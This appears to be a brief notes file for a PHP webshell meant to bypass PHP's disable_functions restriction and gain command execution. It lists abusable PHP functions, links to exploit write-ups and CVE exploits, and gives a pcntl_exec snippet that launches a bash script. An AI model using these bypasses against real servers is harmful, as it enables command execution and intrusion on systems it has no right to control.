一个各种方式突破Disable_functions达到命令执行的shell
dl,exec,system,passthru,popen,proc_open,pcntl_exec,shell_exec,mail,imap_open,imap_mail,putenv,ini_set,apache_setenv,symlink,link
https://antichat.com/threads/463395/#post-4254681
http://drops.wooyun.org/tips/16054
http://drops.wooyun.org/papers/15589
https://www.exploit-db.com/exploits/39766/
https://github.com/l3m0n/exploits/tree/master/CVE-2016-3074
https://github.com/l3m0n/exploits/tree/master/CVE-2016-3078
http://www.myhack58.com/Article/html/3/62/2016/74160.htm
http://blog.gosecure.ca/2016/04/27/binary-webshell-through-opcache-in-php-7/
https://www.leavesongs.com/PHP/php-bypass-disable-functions-by-CVE-2014-6271.html
https://www.exploit-db.com/exploits/35146/
http://www.cnseay.com/2632/comment-page-1/
#exec.php
<?php pcntl_exec(“/bin/bash”, array(“/tmp/b4dboy.sh”));?>
#/tmp/b4dboy.sh
#!/bin/bash
ls -l /
https://www.exploit-db.com/docs/38104.pdf
https://www.exploit-db.com/exploits/4553/
https://www.exploit-db.com/exploits/4517/
https://www.exploit-db.com/exploits/4218/
http://0cx.cc/bypass_disabled_via_mod_cgi.jspx
http://www.cnblogs.com/iamstudy/articles/Exim_mail_bypass_disable_function.html